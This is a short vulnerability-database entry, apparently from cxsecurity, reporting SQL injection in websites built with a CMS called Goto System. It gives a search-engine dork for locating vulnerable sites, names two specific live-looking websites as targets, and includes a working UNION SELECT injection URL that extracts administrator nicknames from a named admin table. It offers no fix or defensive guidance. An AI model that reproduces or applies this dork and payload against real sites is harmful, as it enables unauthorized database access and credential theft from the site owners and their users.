Goto System SQL Injection

2012.01.07
Credit: ruben_linux
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

********************************************** ********************ruben_linux*************** ********************************************** ******vulnerable a injeccion remota SQL******* autor==>ruben_linux equipo=>ruben_linux [+] DORK: "Desarrollado por Goto System" inurl:"php=ID" [+] URL: http://www.foxurbanracing.es/articulo.php?id= [slqi] [+] URL: http://www.stylauto.net/coche.php?id= [sqli] [+] DEMO: http://www.stylauto.net/coche.php?id=999999.9+UNION+ALL+SELECT+%28SELECT+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28usuarios.nick+as+char%29%29%29%2C0x27%2C0x7e%29+FROM+%60admin_stylauto%60.usuarios+Order+by+nick+LIMIT+2%2C1%29+%2C0x31303235343830303536-- *********************************************** ******************ruben_linux****************** ***********************************************


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top